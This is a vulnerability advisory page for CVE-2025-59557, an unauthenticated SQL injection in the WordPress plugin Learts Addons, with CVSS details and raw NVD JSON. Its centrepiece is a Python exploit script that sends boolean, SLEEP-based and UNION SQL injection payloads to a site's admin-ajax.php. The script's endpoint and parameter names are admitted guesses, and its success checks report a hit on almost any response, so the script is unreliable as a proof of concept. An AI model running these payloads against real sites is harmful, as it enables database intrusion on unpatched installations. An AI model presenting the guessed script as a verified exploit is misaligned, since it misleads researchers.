Security Vulnerability Report
中文
CVE-2025-59557 CVSS 9.3 CRITICAL

CVE-2025-59557

Published: 2025-10-22 15:15:54
Last Modified: 2026-04-27 20:16:24
Source: [email protected]

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ThemeMove Learts Addons learts-addons allows SQL Injection.This issue affects Learts Addons: from n/a through < 1.7.5.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Learts Addons < 1.7.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59557 SQL Injection PoC for Learts Addons Plugin # Target: WordPress site with Learts Addons plugin < 1.7.5 # Type: Unauthenticated SQL Injection import requests import sys target_url = "http://target-site.com/wp-admin/admin-ajax.php" def test_sql_injection(): """Test for SQL injection vulnerability in Learts Addons""" # Vulnerable parameters - typical Learts Addons endpoints # Adjust the parameter name and endpoint based on actual vulnerable functionality params = { "action": "learts_ajax_action", "learts_param": "test' OR 1=1 -- -" # Basic injection test } # Time-based blind SQL injection payload time_based_payload = { "action": "learts_ajax_action", "learts_param": f"test' AND (SELECT * FROM (SELECT SLEEP(5))a) -- -" } # Union-based SQL injection to extract data union_payload = { "action": "learts_ajax_action", "learts_param": "test' UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- -" } print("[*] Testing basic injection...") try: response = requests.post(target_url, data=params, timeout=10) if "error" not in response.text.lower() or response.status_code != 200: print("[!] Potential SQL injection detected") except Exception as e: print(f"[-] Error: {e}") print("[*] Testing time-based blind SQL injection...") try: response = requests.post(target_url, data=time_based_payload, timeout=15) if response.elapsed.total_seconds() >= 5: print("[!] Time-based SQL injection confirmed!") except: pass print("[*] Testing union-based SQL injection...") try: response = requests.post(target_url, data=union_payload, timeout=10) if response.status_code == 200: print("[!] Union-based SQL injection possible") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": test_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59557", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:54.117", "lastModified": "2026-04-27T20:16:24.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ThemeMove Learts Addons learts-addons allows SQL Injection.This issue affects Learts Addons: from n/a through < 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/learts-addons/vulnerability/wordpress-learts-addons-plugin-1-7-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.